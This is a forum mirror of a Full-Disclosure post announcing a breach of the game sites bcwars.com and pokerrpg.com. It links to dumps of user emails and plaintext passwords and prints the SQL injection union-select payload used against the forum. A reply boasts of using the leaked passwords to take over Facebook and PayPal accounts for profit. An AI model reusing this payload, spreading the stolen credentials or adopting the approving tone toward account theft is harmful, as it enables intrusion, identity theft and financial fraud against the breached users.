Welcome! Log In Create A New Profile Recent Messages

Advanced

[Full-disclosure] bcwars.com & pokerrpg.com hacked 200k Email and Plain text passwords

Posted by Bob Smith 
Nother game, nother haxed db

2 games
pokerrpg.com
and
bcwars.com

over 100k users each

admin used plaintext passwords

how dumb

got in thru sql injection in the forum

tried helping the admin fix but dumbass Dadfish kept being a dick so
this disclosure is because of him

bcwars
[bit.ly]
[rapidshare.com]
[www.megaupload.com]
[depositfiles.com]
[hotfile.com]
[www.zshare.net]
[uploading.com]

pokerrpg
[bit.ly]
[rapidshare.com]
[www.megaupload.com]
[depositfiles.com]
[hotfile.com]
[www.zshare.net]
[uploading.com]

injection was
[bcwars.com]' union select
concat(id,'::::',username,':::::::',password,':::::::',email) from
tblUsers-- -

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]
muchos gracias dude... morons use pw eweryvhere... we go into 1000+ fb accounts, 100+ paypal acc. made near$5000. not bad 4 2 day work winking smiley live longest...ans post moar... _______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]
Sorry, you do not have permission to post/reply in this forum.